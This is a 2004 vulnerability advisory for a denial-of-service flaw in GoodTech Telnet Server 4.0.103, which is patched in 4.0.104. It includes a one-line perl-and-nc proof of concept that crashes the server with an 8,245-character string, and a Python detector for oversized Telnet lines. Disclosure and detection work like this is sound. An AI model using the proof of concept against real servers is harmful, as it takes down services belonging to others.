Reported January 5, 2004 by Donato Ferrante.

 

 

VERSIONS AFFECTED

 

  • GoodTech Systems Telnet Server 4.0.103

 

DESCRIPTION

 

GoodTech Systems Telnet Server 4.0.103 contains a Denial of Service (DoS) vulnerability. By sending an overly long string as input to the vulnerable server, an attacker can cause the server to stop responding.

 
DEMONSTRATION

The discoverer posted the following demonstration as proof of concept:

 

To test the vulnerability, simply send a long string to the Telnet server:

perl -e 'print "a"x8245' | nc server 23

Alternatively, a string like:
aaaa[..a..]aa (8245 of a)

 

VENDOR RESPONSE

 

GoodTech Systems (http://www.goodtechsys.com/default.asp) has released version 4.0.104, which isn't vulnerable to this condition.
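
For servers that cannot be upgraded immediately, the condition described above can be watched for on the wire. The following Python check is an added example, not part of the original advisory or any vendor code: it strips Telnet command sequences from a client-to-server byte stream and flags a single line longer than a limit. The 1024-byte limit, the function names and the sample streams are assumptions constructed for illustration.

```python
import re

IAC, SB, SE = 0xFF, 0xFA, 0xF0
NEGOTIATION = {0xFB, 0xFC, 0xFD, 0xFE}  # WILL, WONT, DO, DONT (+1 option byte)

def strip_telnet_commands(stream: bytes) -> bytes:
    """Drop Telnet IAC command sequences, keeping only user-typed data."""
    out, i, n = bytearray(), 0, len(stream)
    while i < n:
        if stream[i] != IAC:
            out.append(stream[i])
            i += 1
        elif i + 1 >= n:                 # capture ends inside a command
            break
        elif stream[i + 1] == IAC:       # IAC IAC is an escaped literal 0xFF
            out.append(IAC)
            i += 2
        elif stream[i + 1] in NEGOTIATION:
            i += 3
        elif stream[i + 1] == SB:        # skip subnegotiation through IAC SE
            j = i + 2
            while j < n and not (stream[j] == IAC and stream[j + 1:j + 2] == bytes([SE])):
                j += 2 if stream[j] == IAC else 1
            i = j + 2
        else:                            # other two-byte commands (NOP, AYT, ...)
            i += 2
    return bytes(out)

def longest_line(stream: bytes) -> int:
    """Length of the longest run of data bytes not broken by CR or LF."""
    data = strip_telnet_commands(stream)
    return max(len(part) for part in re.split(rb"[\r\n]", data))

def is_oversized(stream: bytes, limit: int = 1024) -> bool:
    """True when a single line exceeds `limit` (an assumed threshold)."""
    return longest_line(stream) > limit

# Constructed sample streams (not captured traffic).
NORMAL = bytes([IAC, 0xFB, 0x18]) + b"admin\r\nls -la\r\n"
LONG_LINE = b"a" * 8245  # the string length given in the advisory

if __name__ == "__main__":
    for name, s in (("normal", NORMAL), ("long line", LONG_LINE)):
        print(name, longest_line(s), is_oversized(s))
```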

 

CREDIT

 

Discovered by Donato Ferrante.